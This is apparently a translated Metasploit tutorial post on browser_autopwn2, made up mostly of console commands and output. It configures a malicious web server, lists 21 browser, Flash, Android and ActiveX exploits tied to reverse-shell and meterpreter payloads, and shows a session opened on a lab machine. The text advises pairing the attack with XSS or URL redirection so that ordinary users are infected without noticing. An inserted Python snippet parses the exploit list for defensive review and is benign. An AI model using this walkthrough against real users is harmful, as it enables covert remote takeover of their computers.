[MAD-METASPLOIT] 0x21 - Browser attack

Browser attack using Autopwn

autopwn is a module that checks for and runs multiple exploits against web and mobile browsers.

HAHWUL exploit(handler) > search autopwn

Matching Modules

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)

There is no big difference between autopwn and autopwn2, but the newer one is still the better choice.

HAHWUL exploit(handler) > use auxiliary/server/browser_autopwn2
HAHWUL auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

URIPATH is the path the server is exposed on; if it is not set, a random one is generated.

HAHWUL auxiliary(browser_autopwn2) > set URIPATH /
URIPATH => /
HAHWUL auxiliary(browser_autopwn2) > set SRVPORT 4242
SRVPORT => 4242
HAHWUL auxiliary(browser_autopwn2) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
HAHWUL auxiliary(browser_autopwn2) > exploit

HAHWUL auxiliary(browser_autopwn2) >
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 21.340055737
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Using URL: http://192.168.56.101:4242/

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 2      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 3      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 5      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 6      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 19     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 20     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 21     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.56.101:4242/
[*] Server started.

When another ordinary user opens http://192.168.56.101:4242 in a web browser, the exploit code matching that browser is loaded and the user is infected. Of course, this process is conspicuous, so in practice it is combined with XSS or URL redirection so that the infection happens at a moment the user is unlikely to notice.
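An added example, not part of the original post and not Metasploit code, that parses the "Exploits" table autopwn2 printed above and summarizes, per payload platform and listener port, which client-side components the listed modules depend on; a defender reviewing such a list can then confirm each component is patched or disabled. The sample rows are a constructed subset of the table above, and the prefix-to-component mapping is an assumption made for this example.

```python
import re
from collections import Counter

# Constructed sample: a subset of rows copied from the browser_autopwn2 "Exploits" table.
SAMPLE_TABLE = """\
Order Rank Name Payload
----- ---- ---- -------
1 Excellent firefox_webidl_injection firefox/shell_reverse_tcp on 4442
5 Excellent webview_addjavascriptinterface android/meterpreter/reverse_tcp on 4443
7 Great adobe_flash_worker_byte_array_uaf windows/meterpreter/reverse_tcp on 4444
18 Great adobe_flash_hacking_team_uaf windows/meterpreter/reverse_tcp on 4444
19 Good wellintech_kingscada_kxclientdownload windows/meterpreter/reverse_tcp on 4444
20 Good ms14_064_ole_code_execution windows/meterpreter/reverse_tcp on 4444
"""

# One table row: order, rank, module name, payload path, "on", listener port.
ROW_RE = re.compile(
    r"^\s*(?P<order>\d+)\s+(?P<rank>\w+)\s+(?P<name>\S+)\s+"
    r"(?P<payload>\S+)\s+on\s+(?P<port>\d+)\s*$"
)

# Assumed mapping from module-name prefix to the client component it targets.
FAMILIES = {
    "adobe_flash_": "Adobe Flash plugin",
    "firefox_": "Firefox browser",
    "webview_": "Android WebView",
    "samsung_knox_": "Samsung KNOX (Android)",
    "ms14_064_": "Windows OLE (MS14-064)",
}

def parse_table(text):
    """Return one dict per exploit row; header and dash lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["order"], d["port"] = int(d["order"]), int(d["port"])
        d["platform"] = d["payload"].split("/")[0]       # firefox / android / windows
        d["component"] = next((c for p, c in FAMILIES.items()
                               if d["name"].startswith(p)), "other")
        rows.append(d)
    return rows

def summarize(rows):
    """Count modules per (platform, listener port) and per client component."""
    return {
        "listeners": Counter((r["platform"], r["port"]) for r in rows),
        "components": Counter(r["component"] for r in rows),
    }
```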

HAHWUL auxiliary(browser_autopwn2) >
[*] Gathering target information for 192.168.56.101
[*] Sending HTML response to 192.168.56.101
[*] 192.168.56.101 wellintech_kingscada_kxclientdownload - Requested: /HVzrMiilwJj/eNwxdK/
[*] 192.168.56.101 wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
...snip...

HAHWUL auxiliary(browser_autopwn2) > sessions -l

Active sessions

  Id  Type                 Information                        Connection
  --  ----                 -----------                        ----------
  1   meterpreter x86/windows  HAHWUL\Test-Virtualbox @ HAHWUL  192.168.56.101:4242 -> 192.168.56.101:38258 (192.168.56.101)